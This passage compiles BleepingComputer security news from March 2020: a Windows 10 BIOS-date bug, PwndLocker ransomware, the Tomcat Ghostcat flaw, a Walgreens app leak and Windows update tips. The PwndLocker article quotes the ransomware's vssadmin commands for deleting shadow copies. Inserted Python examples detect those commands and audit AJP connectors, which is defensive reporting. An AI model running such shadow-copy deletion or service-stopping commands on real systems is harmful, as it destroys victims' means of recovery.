"Windows 10 freezes again and when you check your BIOS date, you’ll find Windows 10 automatically puts the incorrect BIOS date back in your BIOS! If you change the motherboard, then attempt to restart from the failed install, the install will once again freeze and set the incorrect installation date back into the new motherboard's BIOS!"

The bug persists no matter what changes you make to the system's hardware, as long as you keep trying to boot from the hard drive on which you initially attempted to install Windows 10, version 1909.

This issue affects at least the users of Gigabyte H370 HD3 (for Intel CPUs) and Gigabyte x570 Aorus Elite (for AMD CPUs) motherboards since these two were used by our reader during his tests.

How to fix the 'Windows 10 Y3K Bug'
The solution to this conundrum is to:

1. FIX the BIOS date FIRST.
2. Restart the PC from the Windows 10 installation media (USB flash drive or DVD).
3. Clear ALL drive partitions on the SSD/HDD you want to install Windows 10 on and ONLY THEN start the installation process again.
As long as you make sure that the BIOS date on your motherboard is set to January 18, 3001, or earlier, the Windows 10 1909 installation will go ahead without any issues.

For this to happen the motherboard vendor has to fail to enforce date rules: in our reader's case, although Gigabyte says that the maximum date is 2099, users can freely change it on their own with this unexpected result.

Microsoft's Windows 10 also has to fail to check if all system requirements including the BIOS date are met before starting the installation process.

Weird Windows 10 issue that most won't ever encounter
While this a bizarre Windows 10 bug that no one would normally encounter or care about, it only takes one lucky person who buys an 'open box' motherboard from an online retailer with the wrong BIOS date set by a time traveler.

If they don't know about this issue and therefore don't set a supported BIOS date, they'll most probably keep rebooting and swapping system hardware on the assumption that one of the components is failing.

Those who are more technically inclined might actually attempt to wipe their hard drive or even clean install Windows 10 to make sure that the installation process hasn't failed in any way. It won't work though unless both measures are taken: fixing the BIOS date and clearing the drive.

All in all, even though this issue is as exotic as they come, when an operating system is used by hundreds of millions of customers it's bound for some of its users to encounter it in the end. Case in point, our reader who tipped us on this weird bug.

BIOS date range on Gigabyte MB (Carey Holzman)
"I think Gigabyte needs to fix the BIOS on every current motherboard they sell and Microsoft needs to add a reasonable date check during the initial install process," Holzman told BleepingComputer.

To be fair, messing with the system date and especially with the one in your computer's BIOS is known to cause all sorts of issues and unusual behaviors from software not working properly to websites not loading because of 'expired' site certificates. And now, failed operating system installation attempts.

The lesson of the day? Don't touch the date, BIOS or system, if you don't want weird things happening.

When BleepingComputer contacted Microsoft about this bug, we were told that they had nothing to share.

A video demo of this issue is embedded below.


New PwndLocker Ransomware Targeting U.S. Cities, Enterprises
7.3.2020 
Bleepingcomputer    Ransomware

Driven by the temptation of big ransom payments, a new ransomware called PwndLocker has started targeting the networks of businesses and local governments with ransom demands over $650,000.

This new ransomware began operating in late 2019 and has since encrypted a stream of victims ranging from local cities to organizations.

BleepingComputer has been told that the ransom amounts being demanded by PwndLocker range from $175,000 to over $660,000 depending on the size of the network.

It is not known if any of these victims have paid at this time.

PwndLocker says they encrypted Lasalle County's network
A source recently told BleepingComputer that the ransomware attack against Lasalle County in Illinois was conducted by the operators of the PwndLocker Ransomware.

When asked by BleepingComputer, the ransomware operators said they are behind the attack and are demanding a 50 bitcoin ransom ($442,000) for a decryptor.

The attackers have also told BleepingComputer that they have stolen data from the county before encrypting the network. From an image and a list of folders shared with BleepingComputer by the attackers, it does look like files were stolen from the county.

Local media reports that Lasalle County has no plans on paying the ransom.

BleepingComputer has contacted Lasalle County via email for confirmation but the emails were rejected. We have also left a voicemail but have not heard back at this time.

Update 3/3/2020 8:19 AM: PwndLocker has also encrypted the network for the City of Novi Sad in Serbia.
Update 3/3/2020 7:18 PM: PwndLocker shared an image and a list of folders that they say were stolen from Lasalle County.

The PwndLocker Ransomware
In a sample shared with BleepingComputer by MalwareHunterTeam, when executed PwndLocker will attempt to disable a variety of Windows services using the 'net stop' command so that their data can be encrypted.

Some of the applications whose services are targeted include Veeam, Microsoft SQL Server, MySQL, Exchange, Acronis, Zoolz, Backup Exec, Oracle, Internet Information Server (IIS), and security software such as Kaspersky, Malwarebytes, Sophos, and McAfee.

The ransomware will also target various processes and terminate them if detected. Some of the processes targeted include Firefox, Word, Excel, Access, and other processes related to security software, backup applications, and database servers.

PwndLocker then clears the Shadow Volume Copies, so that they cannot be used to recover files, with the following commands:

vssadmin.exe delete shadows /all /quiet
vssadmin.exe resize shadowstorage /for=D: /on=D: /maxsize=401MB
vssadmin.exe resize shadowstorage /for=D: /on=D: /maxsize=unbounded
Once the system has been prepped for encryption, PwndLocker will begin to encrypt the computer.
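The service stops and shadow-copy commands described above run before any file is encrypted, which makes them a useful detection point. The following is an added example, not code from the article or from the malware sample: it flags those commands in constructed process-creation log lines and correlates them per host; the log format and the service-name hints are assumptions.

```python
"""Detect PwndLocker's pre-encryption steps in process-creation logs.

Added example (not from the article or the malware): the log format, the
sample lines and the service-name hints are all constructed.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

# Products the article lists as 'net stop' targets, as lower-case substrings of
# the service name. Real service names vary by product and version, so these
# hints are a constructed starting point, not a complete list.
TARGETED_SERVICE_HINTS = (
    "veeam", "sql", "mysql", "exchange", "acronis", "zoolz", "backupexec",
    "bedbg", "oracle", "w3svc", "kaspersky", "kavfs", "malwarebytes", "mbam",
    "sophos", "mcafee", "mcshield",
)

# The two vssadmin actions quoted in the article: deleting shadow copies and
# shrinking shadow storage so that Windows discards them.
SHADOW_RULES = (
    ("vssadmin_delete_shadows", "high",
     re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b", re.I)),
    ("vssadmin_resize_shadowstorage", "high",
     re.compile(r"\bvssadmin(?:\.exe)?\s+resize\s+shadowstorage\b", re.I)),
)
NET_STOP = re.compile(r'\bnet1?(?:\.exe)?\s+stop\s+"?([^"\s]+)"?', re.I)


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    severity: str
    command_line: str


def inspect_command(host, cmd):
    """Return the findings for one command line (empty list if benign)."""
    findings = [Finding(host, name, sev, cmd)
                for name, sev, rx in SHADOW_RULES if rx.search(cmd)]
    m = NET_STOP.search(cmd)
    if m and any(h in m.group(1).lower() for h in TARGETED_SERVICE_HINTS):
        findings.append(Finding(host, "net_stop_backup_or_security_service",
                                "medium", cmd))
    return findings


def scan(lines):
    """Parse 'timestamp|host|user|command line' records (constructed format)."""
    findings = []
    for raw in lines:
        raw = raw.strip()
        if not raw or raw.startswith("#"):
            continue
        _ts, host, _user, cmd = raw.split("|", 3)
        findings.extend(inspect_command(host, cmd))
    return findings


def correlate(findings, min_service_stops=2):
    """Hosts showing shadow-copy tampering plus repeated stops of backup or
    security services: the combination the article describes, which any single
    rule on its own would miss."""
    per_host = defaultdict(lambda: {"shadow": 0, "stops": 0})
    for f in findings:
        key = "shadow" if f.rule.startswith("vssadmin_") else "stops"
        per_host[f.host][key] += 1
    return sorted(h for h, c in per_host.items()
                  if c["shadow"] and c["stops"] >= min_service_stops)


# Constructed sample log: one host running the full PwndLocker sequence, one
# workstation with benign vssadmin/net use, one DBA stopping SQL Server alone.
SAMPLE_LOG = """\
# constructed sample: timestamp|host|user|command line
2020-03-02T02:14:05Z|FILESRV01|CORP\\svc_backup|net stop VeeamBackupSvc /y
2020-03-02T02:14:06Z|FILESRV01|CORP\\svc_backup|net stop "MSSQLSERVER" /y
2020-03-02T02:14:07Z|FILESRV01|CORP\\svc_backup|net stop Spooler
2020-03-02T02:14:09Z|FILESRV01|CORP\\svc_backup|vssadmin.exe delete shadows /all /quiet
2020-03-02T02:14:10Z|FILESRV01|CORP\\svc_backup|vssadmin.exe resize shadowstorage /for=D: /on=D: /maxsize=401MB
2020-03-02T02:14:11Z|FILESRV01|CORP\\svc_backup|vssadmin.exe resize shadowstorage /for=D: /on=D: /maxsize=unbounded
2020-03-02T08:30:00Z|WKS-042|CORP\\jdoe|vssadmin.exe list shadows
2020-03-02T08:31:00Z|WKS-042|CORP\\jdoe|net stop Spooler
2020-03-02T09:00:00Z|DBSRV02|CORP\\dba|net stop MSSQLSERVER
"""


def scan_sample():
    return scan(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    results = scan_sample()
    for f in results:
        print(f"{f.severity:6} {f.host:10} {f.rule:36} {f.command_line}")
    print("hosts showing the full pre-encryption pattern:", correlate(results))
```

On the sample, the isolated SQL Server stop on DBSRV02 stays a medium single finding, while FILESRV01 is the only host that trips the correlation.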

While encrypting files, it will skip any files that contain one of the following extensions.

.exe, .dll, .lnk, .ico, .ini, .msi, .chm, .sys, .hlf, .lng, .inf, .ttf, .cmd, .bat, .vhd, .bac, .bak, .wbc, .bkf, .set, .win, .dsk
The ransomware will also skip all files located in the following folders:

$Recycle.Bin
Windows
System Volume Information
PerfLogs
Common Files
DVD Maker
Internet Explorer
Kaspersky Lab
Kaspersky Lab Setup Files
WindowsPowerShell
Microsoft
Microsoft.NET
Mozilla Firefox
MSBuild
Windows Defender
Windows Mail
Windows Media Player
Windows NT
Windows Photo Viewer
Windows Portable Devices
Windows Sidebar
WindowsApps
All Users
Uninstall Information
Microsoft
Adobe
Microsoft
Microsoft_Corporation
Packages
Temp
When encrypting files, MalwareHunterTeam has seen it using the .key and .pwnd extensions depending on the victim. The sample BleepingComputer analyzed uses the .key extension as shown below.

Files encrypted by PwndLocker
When done encrypting, ransom notes named H0w_T0_Rec0very_Files.txt will be located throughout the computer and on the Windows desktop.

These ransom notes will contain an email address and Tor payment site that can be used to get payment instructions and the ransom amount.

PwndLocker Ransom Note
The PwndLocker Payment Site allows victims to decrypt two files for free, talk to the ransomware operators and contains the ransom amount in bitcoins.

PwndLocker Tor Payment Site
It is not known at this time if there are any weaknesses in the encryption algorithm.


Active Scans for Apache Tomcat Ghostcat Vulnerability Detected, Patch Now
7.3.2020 
Bleepingcomputer   Vulnerebility

Ongoing scans for Apache Tomcat servers unpatched against the Ghostcat vulnerability that allows potential attackers to take over servers have been detected over the weekend.

As cyber threat intelligence firm Bad Packets said on Saturday, "mass scanning activity targeting this vulnerability has already begun. PATCH NOW!"

Ghostcat is a high-risk file read/include vulnerability tracked as CVE-2020-1938 and present in the Apache JServ Protocol (AJP) of Apache Tomcat between versions 6.x and 9.x.

The Apache Tomcat developers have released versions 7.0.100, 8.5.51, and 9.0.31 to patch the vulnerability, however, users of version 6.x will have to upgrade to a newer version since this branch has already reached end-of-support and is no longer updated — the last update for 6.x was released on April 7, 2017.

All unpatched Apache Tomcat 6, 7, 8, and 9 installations ship with AJP Connector enabled by default and listening on all configured server IP addresses on port 8009.

Proof-of-concept exploits available
Tenable says that proof-of-concept exploits have already been shared by security researchers on GitHub (1, 2, 3, 4, 5).

If you can't immediately update or upgrade your server to a patched Tomcat version, Chaitin Tech's research team recommends disabling the AJP Connector altogether if it is not actively used, or configuring the requiredSecret attribute of the AJP Connector to set authentication credentials.

Chaitin Tech also provides a security assessment tool that will help you discover Tomcat servers vulnerable to attacks targeting Ghostcat on your network.
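To check a Tomcat instance's own configuration for the exposure described above, the following added example (not Chaitin Tech's tool and not part of the article) parses a constructed server.xml, reports every AJP connector that listens on all addresses or has no shared secret, and treats a commented-out connector as disabled. Attribute names follow Tomcat's documentation; the fixed releases renamed requiredSecret to secret and added secretRequired, and the check accepts either spelling.

```python
"""Audit a Tomcat server.xml for AJP connectors exposed to Ghostcat (CVE-2020-1938).

Added example, not Chaitin Tech's tool: the server.xml below is constructed.
Patching to 7.0.100 / 8.5.51 / 9.0.31 is the fix; this check covers the interim
mitigations (disable the connector, bind it to loopback, require a secret).
"""
import xml.etree.ElementTree as ET

# Constructed configuration: an AJP connector with the unpatched defaults the
# article describes (all addresses, no secret), a hardened one, an HTTP connector
# that must not be reported, and a commented-out (disabled) connector.
SAMPLE_SERVER_XML = """
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" redirectPort="8443" />
    <!-- weak: default AJP connector, all addresses, no shared secret -->
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
    <!-- hardened: loopback only, secret required (placeholder value) -->
    <Connector port="8010" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="REPLACE_WITH_LONG_RANDOM_SECRET" />
    <!-- disabled:
    <Connector port="8011" protocol="AJP/1.3" />
    -->
  </Service>
</Server>
"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}
WILDCARD = {"0.0.0.0", "::", "0:0:0:0:0:0:0:0"}


def is_ajp(connector):
    proto = connector.get("protocol", "HTTP/1.1")  # Tomcat's default is HTTP
    return proto.startswith("AJP/") or proto.startswith("org.apache.coyote.ajp.")


def audit_connector(connector):
    """Return port, effective bind address and the list of issues for one AJP connector."""
    issues = []
    address = connector.get("address")  # absent = all addresses on unpatched versions
    if address is None or address in WILDCARD:
        issues.append('listens on all addresses: set address="127.0.0.1" or remove the connector')
    elif address not in LOOPBACK:
        issues.append(f"bound to {address}: confirm only the front-end proxy can reach it")
    # The fixed releases renamed requiredSecret to secret and added secretRequired;
    # accept either spelling so older configurations are judged correctly.
    secret = connector.get("secret") or connector.get("requiredSecret")
    if not secret:
        issues.append('no shared secret: set secret="..." and secretRequired="true"')
    return {"port": connector.get("port"), "address": address or "0.0.0.0", "issues": issues}


def audit_server_xml(xml_text):
    """Audit every AJP connector in the document (comments are skipped by the parser)."""
    root = ET.fromstring(xml_text)
    return [audit_connector(c) for c in root.iter("Connector") if is_ajp(c)]


def exposed_ajp_ports(xml_text):
    """Ports of AJP connectors with at least one issue; empty means nothing to fix here."""
    return [r["port"] for r in audit_server_xml(xml_text) if r["issues"]]


if __name__ == "__main__":
    for r in audit_server_xml(SAMPLE_SERVER_XML):
        state = "OK" if not r["issues"] else "; ".join(r["issues"])
        print(f"AJP connector on port {r['port']} ({r['address']}): {state}")
```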

Detecting Tomcat servers exposed to Ghostcat attacks (Chaitin Tech)
According to Shodan, more than 890,000 Tomcat servers are currently reachable over the Internet, while BinaryEdge found over 1 million.

The affected Apache Tomcat versions and the versions in which the Ghostcat vulnerability has been patched are listed in the table below.

Version            Impacted versions   Fixed version
Apache Tomcat 9    Up to 9.0.30        9.0.31
Apache Tomcat 8    Up to 8.5.50        8.5.51
Apache Tomcat 7    Up to 7.0.99        7.0.100
Apache Tomcat 6    All versions        N/A

Critical flaw that can lead to server takeover
"Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection," the developers explain. "If such connections are available to an attacker, they can be exploited in ways that may be surprising."

As researchers at Chinese security outfit Chaitin Tech who discovered the bug detailed, after successfully exploiting an unpatched Tomcat server "an attacker can read the contents of configuration files and source code files of all webapps deployed on Tomcat."

"In addition, if the website application allows users upload file, an attacker can first upload a file containing malicious JSP script code to the server (the uploaded file itself can be any type of file, such as pictures, plain text files etc.), and then include the uploaded file by exploiting the Ghostcat vulnerability, which finally can result in remote code execution."

According to Snyk and Red Hat, Tomcat also ships with apps built using the Spring Boot Java framework, as well as other Java-based servers and frameworks including but not limited to JBoss Web Server (JWS) and JBoss Enterprise Application Platform (EAP) as ZDNet reported.


US Drugstore Giant Walgreens Leaked Users' Sensitive Info
7.3.2020 
Bleepingcomputer   Incindent

US drugstore chain giant Walgreens disclosed over the weekend that some of its mobile apps' users have been able to inadvertently access other users' sensitive information because of a bug.

Walgreens is the second-largest pharmacy chain in the US right behind CVS Health, operating 9,277 drugstores and employing 230,000 people within all 50 states.

PII and PHI accidentally leaked
The data leak incident was caused by the unauthorized disclosure of secure messages within the Walgreens mobile app according to a data breach notification email sent by the company to affected customers.

The bug allowed "a small percentage of impacted customers" to view one or more personal messages containing limited health-related info of other app users "between January 9, 2020 and January 15, 2020."

Walgreens said that affected customers might have accidentally gained access and viewed sensitive information of others, including first and last name, prescription numbers and drug names, store numbers, and shipping address where applicable.

The company also said that "no financial information such as Social Security number or bank account information was involved in this incident."

The mobile app bug is now fixed
"On January 15, 2020, Walgreens discovered an error within the Walgreens mobile app personal secure messaging feature," the notification says.

"Our investigation determined that an internal application error allowed certain personal messages from Walgreens that are stored in a database to be viewable by other customers using the Walgreens mobile app.

"Once we learned of the incident, Walgreens promptly took steps to temporarily disable message viewing to prevent further disclosure and then implemented a technical correction that resolved the issue.

"Walgreens will conduct additional testing as appropriate for future changes to verify the change will not impact the privacy of customer data."

While Walgreens didn't mention what mobile app was affected by the bug, at the moment the Walgreens iOS app has been rated by users more than 2,500,000 times in the Apple Store while the Android Walgreens app has over 10,000,000 installations.

Walgreens recommends that customers monitor their prescription and medical records, and shared the steps to take to protect one's information at the end of the data breach notice.


Windows 10 1909 Starts Getting Microsoft's New Fluent Icons
7.3.2020 
Bleepingcomputer    OS

Ahead of schedule, Microsoft has started rolling out some of the new Fluent system icons to users running Windows 10 1909.

Earlier this month, Microsoft announced that they had rolled out new icons for the Mail and Calendar apps to Windows 10 insiders and that current Windows 10 builds would receive them over the coming months.

Microsoft appears to have moved up their plans as BleepingComputer has seen new Fluent-based icons in Windows 10 1909 for the Calendar, Mail, File Explorer, Your Phone, and OneDrive apps.

Rolled out Fluent icons to Windows 10 1909
The new Windows 10 system icons utilize Microsoft's Fluent Design System, which is supported in Windows, iOS, Android, and web applications so that developers can create user interfaces and icons that are the same for every platform.

"The addition of color also gives a cohesive design language across platforms: the icon that’s familiar in Windows 10 is the same on Android, iOS, and Mac, providing a wayfinding path across your digital life," Christina Koehn, Principal Design Director at Microsoft, explained in a blog post. "The new rounded corners across the Windows 10 interface achieve the same goal: making these icons feel like they live in the real world; something familiar and approachable to grab onto."

The full gallery of Fluent icons created to replace existing Windows 10 system icons can be seen below.

Windows 10 Fluent Icons


How to Pause Windows 10 Automatic Updates To Avoid Critical Bugs
7.3.2020 
Bleepingcomputer   OS

Windows 10 as a 'service' is updated regularly, and Microsoft recommends that users allow Windows to automatically install new updates as they are released. There are occasions, however, when you don't want to install an update due to fear of reported critical bugs or compatibility issues.

For example, just recently Microsoft pulled the KB4524244 update because of freezes, boot problems, and installation issues. A recent Windows 10 KB4532693 update is also causing issues with users losing their profiles, being logged into the wrong one, and in some cases losing data.

Due to this, some feel it's wise to pause Windows 10 automatic updates before a feature update or other scheduled release to give Microsoft time to fix discovered bugs. Once it is determined that the update does not cause issues, you can unpause automatic updates and install the new fixes.

Thankfully, Windows 10 Home, Pro and Enterprise versions allow users to pause updates using the Windows Settings, the Group Policy, or Registry modifications, which we explain below.

Method 1: Pause updates via Windows 10 Settings
Previously, only Windows 10 Professional users were allowed to pause Windows updates from the Settings app, but that changed with Windows 10's May 2019 Update.

Now all Windows 10 versions can use the Windows Update settings to pause updates.

If you're on Windows 10 Home, you can pause updates for up to 7 days and Windows 10 Professional users can pause updates for 35 days.

To pause updates on Windows 10, please follow these steps:

Open Settings.
Go to Update & Security.
Click 'Choose Advanced options'.
Under the 'Pause updates' section, you will see a drop-down menu labeled 'Pause until'. You can use this drop-down menu to select a date that you wish to pause updates to.

Once done, you can close the Settings window for the changes to go into effect.
Windows 10 will no longer check for new updates until the selected date is reached.

Method 2: Pause updates via Windows 10 Group Policy
Unlike Windows 10 Home, Windows 10 Pro comes with Group Policy editor and you can use it to disable automatic updates permanently.

To pause Windows Updates with Group Policy editor, follow these steps:

Search in the Start Menu for 'gpedit.msc' and select it when the result appears.
When the Group Policy Editor opens, navigate to the following path: Computer Configuration\Administrative Templates\Windows Components\Windows Update
Under the Windows Update section, you will see a policy called 'Configure Automatic Updates' as shown below. Double-click on the policy to open it.

To disable automatic updates in Windows 10 for an unlimited period, set this policy to 'Disabled'.

When done, click on the Apply and then OK button to save the policy.
Windows 10 will no longer automatically install updates, but you can still manually check for updates and install them via Windows Update.

To enable automatic updates again, set this policy to 'Not Configured'.

Method 3: Pause updates via the Windows 10 Registry
You can also manually create the above policy to permanently pause Windows 10 automatic updates for all versions of Windows 10 using the Registry Editor.

To pause Windows 10 automatic updates via the Registry, you would need to configure the following policy:

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate"=dword:00000001

To do this via the Registry Editor, please perform the following steps:

Open Windows Run (Win+R) and type Regedit.
In Registry Editor, navigate to the following path: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows
Locate the Windows folder and right-click on it.
Select New and then Key. When prompted to name the key, give it the name 'WindowsUpdate' and press Enter.
Right-click this new key folder and click on New, then Key, and give the new key the name 'AU'.
On the right-side, right-click anywhere and select New > DWORD (32-bit) Value option and name the new value 'NoAutoUpdate'.
Double-click on the 'NoAutoUpdate' value and set its Value Data to 1.
When done, the new values should look like the image below.
New NoAutoUpdate value
Click OK and restart the PC.
Windows automatic updates will now be paused permanently until you delete the NoAutoUpdate value.


New Evasion Encyclopedia Shows How Malware Detects Virtual Machines
7.3.2020 
Bleepingcomputer   Virus

A new Malware Evasion Encyclopedia has been launched that offers insight into the various methods malware uses to detect if it is running under a virtual environment.

To evade detection and analysis by security researchers, malware may check if it is running under a virtualized environment, such as a virtual machine in VirtualBox or VMware.

If these checks indicate that it is being run in a VM, the malware will simply not run, and in some cases, delete itself to prevent analysis.

The Malware Evasion Encyclopedia
Created by Check Point Research, the Malware Evasion Encyclopedia is broken into different categories of information that a malware will use to detect if it is running under a virtual machine.

While sharing this information may allow malware authors to learn some new techniques, Check Point feels that the value to the information security community far outweighs any benefit to malware developers.

"It is our belief the value of sharing with the community is far greater than the risk of malware authors using this," Check Point Research told BleepingComputer.

The current sections in the encyclopedia with listed techniques are:

Filesystem
Registry
Generic OS queries
Global OS objects
UI artifacts
OS features
Processes
Network
CPU
Hardware
Firmware tables
Hooks
macOS
Inside each section are code snippets that illustrate how malware determines if it is running under a virtual environment and suggested countermeasures to defeat these checks.

For example, the 'Processes' section shows how malware checks for certain processes used by VMs, the 'Firmware Tables' section explains how malware looks for certain strings in the BIOS, and the 'Generic OS queries' section lists user names that are commonly looked for.

Example evasion technique by checking for certain user names
When we asked if Check Point Research plans on further updating the encyclopedia, they told us that they will continue to do so and welcome input from the information security community.

"We plan on maintaining this. Actually, this web site is just the “face” for a GitHub account with all the info. Anyone may submit pull requests and add his own technique if he spots one so the encyclopedia can be a valuable tool for everyone. Hopefully, this will help our community keep one step ahead of the bad guys," Check Point responded to us.

If you are building a virtual machine for malware analysis or just want to learn how malware attempts to evade detection, Check Point's encyclopedia is a great place to start.